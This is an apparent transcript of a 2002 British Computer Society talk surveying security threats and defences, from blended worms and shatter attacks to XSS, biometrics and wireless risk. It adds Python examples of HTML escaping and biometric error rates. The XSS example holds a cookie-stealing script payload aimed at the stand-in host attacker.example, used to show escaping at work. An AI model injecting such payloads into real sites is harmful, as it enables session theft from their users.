
Some Security Hot Issues

Allan Wall, BCS North London Branch Meeting, 13th November 2002



  1. Some Security Hot Issues
  Allan Wall, BCS North London Branch Meeting, 13th November 2002

  2. Who is the enemy?

  Classification        Attacker Description                    Target                     Results
  Computer Crime        Vandal, Script Kiddie, Packet Monkey    Email, Web Sites           Downtime, Defacement, Denial of Service
  Computer Crime        ‘Criminal’ Cracker, ‘Black Hat’          Assets                     Monetary Gain
  Information Warfare   Government Organization                 Political Infrastructure   Political Power, Balance Change
  Cyber Terrorist       Terrorists, Non-State Actors            Physical Infrastructure    Destruction

  3. Where do the threats come from?
  [Chart: attacks per 10,000 Internet users, Jan.–Jun. 2002, comparing countries with more than 1M Internet users against countries with fewer than 1M (Symantec 2002)]

  4. The Redundant Message..
  Cost of damage (186 respondents, 2001 CSI/FBI Computer Crime and Security Survey):
  • $151,230,100 – Theft of proprietary information
  • $45,288,150 – Virus
  • $35,001,650 – Insider net abuse
  • $19,066,601 – System penetration
  • $4,283,600 – Denial of service
  CodeRed: estimated cost 2.5 billion dollars. Nimda: estimated cost 500+ million dollars.

  5. The Blended Threat
  • Isn’t going away
  • Combines hacking, DoS and worm-like propagation
  • Most recent example – W32.Bugbear@mm:
  • Mass-mailing worm with its own SMTP engine
  • Discovers and utilises network shares to spread
  • Logs keystrokes
  • Creates a backdoor for remote access
  • Attempts to disable AV and personal-firewall products
  • Due to a bug in its network-share spreading routine it also hits shared printers, which then print reams of gibberish

  6. Blended Threat Defence
  • Proactive vulnerability management
  • Security in layers
  • Security in depth
  • Superior security response

  7. The Sleeper Virus
  • Not a fast mailer or a mass mailer – it is slower and more subtle
  • Hybris – a computer worm that uses encrypted plug-ins downloaded over the Internet to update itself
  • Sits quietly monitoring email traffic
  • Compiles a list of addresses and slowly leaks out infected emails
  • Morphs depending on the updates it receives

  8. The Sleeper Virus Defence
  • Update virus definitions frequently
  • Treat email attachments with suspicion
  • Use a personal firewall

  9. Shatter Attacks
  • The mechanism used is the Win32 API, which has been relatively static since Windows NT was first released in July 1993
  • Microsoft cannot change it without a full-scale redesign
  • An example – Windows messaging / message queues: any process on the same interactive desktop can send messages to any window, and the system does not check the sender’s privilege, so a low-privileged process can drive a window owned by a higher-privileged process (such as a service that interacts with the desktop) and have code run in that process’s context
  • An attacker can use these techniques to escalate their privileges to those of the process that owns the window

  10. Shatter Attacks - Defence
  • Full-scale Windows redesign (scrapping Win32)
  • Better design by every Windows application vendor – in particular, privileged services should not own windows on the interactive desktop
  • Protect your Windows systems to make it hard for undesirables to get the local access they need to exploit this
  • Needs continual monitoring

  11. Cross site scripting attacks - XSS
  • “Expert hacks Hotmail in 1 line of code!”
  • Attackers inject JavaScript, VBScript, ActiveX, HTML or Flash into a page served by a site the user trusts, so the user’s browser runs it with that site’s privileges
  • Exploits dynamic web-site content that echoes untrusted input, resulting in:
  • account hijacking
  • changing of user settings
  • cookie theft/poisoning
  • false advertising
  • Will become more common, even automated

  12. XSS attacks - Defence
  • Design web pages that validate user input (accept only what the field actually needs)
  • HTML-escape untrusted data when it is written into a page, so the browser displays it instead of interpreting it as markup
  • Use the Perl scripting tools designed to help (taint mode and the HTML::Entities module, for example)
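The two defences on this slide, validation and HTML escaping, as an added example in Python rather than Perl. This is not code from the talk or its references; the function names, the allow-list pattern and the cookie-stealing payload are constructed for illustration, and attacker.example is a placeholder host.

```python
import html
import re

# Constructed attacker input (example, not from the talk): a reflected-XSS
# payload of the cookie-theft kind the previous slide lists.
ATTACK = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def render_greeting_vulnerable(name: str) -> str:
    """Interpolates untrusted input straight into HTML. Whatever the user
    supplied becomes markup, so a <script> tag inside 'name' executes in the
    site's origin when the page is viewed."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_escaped(name: str) -> str:
    """Same page with HTML escaping at the output point: <, >, & are encoded
    so the payload is displayed as text. quote=True also encodes ' and ",
    which makes the same helper safe inside a quoted attribute."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_search_attr_escaped(query: str) -> str:
    """Attribute context. Without quote=True a double quote in the input
    would close value="..." and let the attacker append an onfocus=...
    handler; with it the quote becomes &quot; and stays inside the value."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


# Hypothetical allow-list for a username field: letters, digits, _ . - only.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(name: str) -> bool:
    """Input validation: reject anything outside a conservative allow-list
    before it ever reaches a template. This complements escaping rather than
    replacing it; a free-text field such as a comment cannot be restricted
    this way and still needs escaping on output."""
    return USERNAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    print("vulnerable:", render_greeting_vulnerable(ATTACK))
    print("escaped:   ", render_greeting_escaped(ATTACK))
    print("attribute: ", render_search_attr_escaped('" autofocus onfocus="alert(1)"'))
    print("validates: ", is_valid_username("alice_01"), is_valid_username(ATTACK))
```

Escaping is done where the data is written into the page, not where it is read, because the same value may later be placed in a different context (element body, attribute, URL) that needs a different encoding.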

  13. Biometrics
  • More secure and stronger identification
  • Moving away from (multiple) IDs/passwords, reducing the risk from “lost” or loaned credentials (including tokens)
  • Most common: fingerprint, hand, iris / retina / facial / voice recognition
  • Provides the inextricable link – the guarantee that the registered user is actually present
  • Or does it…….?

  14. Biometrics
  • Relatively high-cost solutions and immature technology – bigger cost/risk if they fail (but cheaper to support)
  • Privacy and intrusiveness issues
  • Accuracy – false positive / false negative rates
  • Facial recognition: only 60-80% accurate, with 1 in 100 false positives
  • Unproven/untested technologies – just how hard or easy are they to spoof?
  • Example: fingerprint recognition can be spoofed for under $20 in about 30 minutes using “jelly” fingers
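What a 1-in-100 false positive rate means in practice, as an added worked example that is not part of the talk. The sensitivity of 0.7 is taken from the slide’s 60-80% figure; the prevalence of genuine users among attempts (1 in 1,000) and the assumption that repeated impostor attempts are independent are my own, and a correlated spoof such as a gummy finger is worse than the independent case.

```python
def ppv(sensitivity: float, false_accept_rate: float, prevalence: float) -> float:
    """Positive predictive value: of all 'match' alerts, the fraction that
    are genuine (Bayes' rule over a single attempt).
    P(genuine | match) = sens*prev / (sens*prev + FAR*(1-prev))."""
    true_alerts = sensitivity * prevalence
    false_alerts = false_accept_rate * (1.0 - prevalence)
    return true_alerts / (true_alerts + false_alerts)


def expected_false_accepts(false_accept_rate: float, impostor_attempts: int) -> float:
    """Expected number of impostors accepted across a batch of attempts."""
    return false_accept_rate * impostor_attempts


def p_at_least_one_false_accept(false_accept_rate: float, attempts: int) -> float:
    """Probability that an impostor is accepted at least once in 'attempts'
    tries. Assumes the attempts are independent, which is an assumption of
    this example; a spoof that works once tends to keep working."""
    return 1.0 - (1.0 - false_accept_rate) ** attempts


if __name__ == "__main__":
    # Slide figures: ~70% sensitivity, 1 in 100 false positives.
    # Prevalence of 1 in 1,000 is an assumed value, not from the talk.
    print(f"PPV at 1/1000 prevalence: {ppv(0.7, 0.01, 0.001):.3f}")
    print(f"Expected false accepts per 10,000 impostor attempts: "
          f"{expected_false_accepts(0.01, 10_000):.0f}")
    print(f"P(impostor accepted within 100 tries): "
          f"{p_at_least_one_false_accept(0.01, 100):.3f}")
```

With these inputs only about 6.5% of matches are genuine, and an impostor who can retry 100 times has roughly a 63% chance of getting through, which is the point behind “or does it…?” on the previous slide.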

  15. Background security checks
  Fewer than 60% of organisations carry out checks on new staff, even in these categories:
  • IT security professionals
  • Banking
  • Critical infrastructure
  • Energy
  • Telecoms
  • Utilities
  Employees are still the weakest link.

  16. Targeted Attacks
  • Focussed attack on specific targets within the organisation:
  • Spoofed email or a CD
  • Social engineering to create “familiarity”: a message about a business opportunity, hobby or interest
  • Low-activity malware implanted, which disables AV, collects keystrokes or audio, and emails the data out
  • Response – “combined interoperable defence”

  17. The Good News… The Bad News… Airborne Viruses
  Personal, local and wide-area wireless connectivity is enabling the enterprise and exposing it to new security risk:
  • 2.5G and 3G can be visible for many miles
  • 802.11 can be visible from over a mile away
  • Bluetooth: 30 feet
  Source: Symantec 2002

  18. Airborne Viruses - Defence
  • Unless you don’t have assets worth protecting . . .
  • . . . don’t use wireless technology without putting in the countermeasures that are available!

  19. The law of requisite variety (Prof. Ross Ashby)
  There must be as much variety in the control mechanism as there is variety in the threat.
  Formal descriptions:
  The abundance or variety of alternative control actions which a control mechanism is capable of executing must be at least equal to the abundance or variety of the spontaneous fluctuations which have to be corrected by the control mechanism, if the control mechanism is to perform its function effectively.
  Only a greater amount of variety in a regulator can control the variety present in a given system.
  The larger the variety of actions available to a control system, the larger the variety of perturbations it is able to compensate.
  Only variety can destroy variety.

  20. Ways to win..
  • Proactive security – mitigate your risk (do not just rely on technology..)
  • Threats are defeated by information + technology
  • Superior response capability
  • “In-source” / outsource
  • Size and flexibility in defence

  21. References
  • Symantec figures: Internet Security Threat Report, Volume II – http://enterprisesecurity.symantec.com/content.cfm?EID=0&ArticleID=1539
  • Blended threats: http://www.informationweek.com/story/IWK20020516S0020 and http://www.symantec.com/symadvantage/012/blended.html
  • Sleeper virus: http://news.zdnet.co.uk/story/0,,t269-s2083648,00.html
  • Shatter attacks: http://security.tombom.co.uk/shatter.html
  • Cross site scripting: http://www.securiteam.com/securityreviews/5FP000A81E.html
  • Biometrics (BBC): http://news.bbc.co.uk/1/hi/sci/tech/1991517.stm
  • Airborne viruses: http://www.networkmagazine.com/article/NMG20001130S0001/2
  • Ross Ashby: http://pespmc1.vub.ac.be/ASHBBOOK.html
